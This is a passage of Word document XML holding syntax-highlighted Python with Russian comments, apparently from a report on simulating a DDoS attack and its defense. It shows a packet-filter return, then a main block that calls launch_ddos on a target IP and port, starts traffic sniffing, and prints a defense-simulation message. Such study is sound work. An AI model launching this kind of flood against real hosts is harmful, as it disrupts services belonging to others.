          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="AF00DB"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>True</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t># Пакет заблокирован</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B56111" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="AF00DB"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>False</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t># Пакет пропущен</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4359A50A" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t># Основная функция</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611D3EA2" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="AF00DB"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>__name__</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> == </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"__main__"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F8AA10" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="008E40AC" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="008E40AC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Запуск</w:t>
      </w:r>
      <w:r w:rsidRPr="008E40AC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00153D51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:r w:rsidRPr="008E40AC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>атаки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A10028" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00153D51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008E40AC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00153D51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008E40AC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>launch_ddos</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>target_ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>target_port</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>duration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="098658"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228FB7EE" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8FDE2E" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t># Запуск анализа трафика</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704B77CE" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>start_sniffing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4005A9" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t># Симуляция защиты</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2525E68F" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="005F1B9E" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12809">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Симуляция</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>защиты</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>..."</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0ABE56" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E12809">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
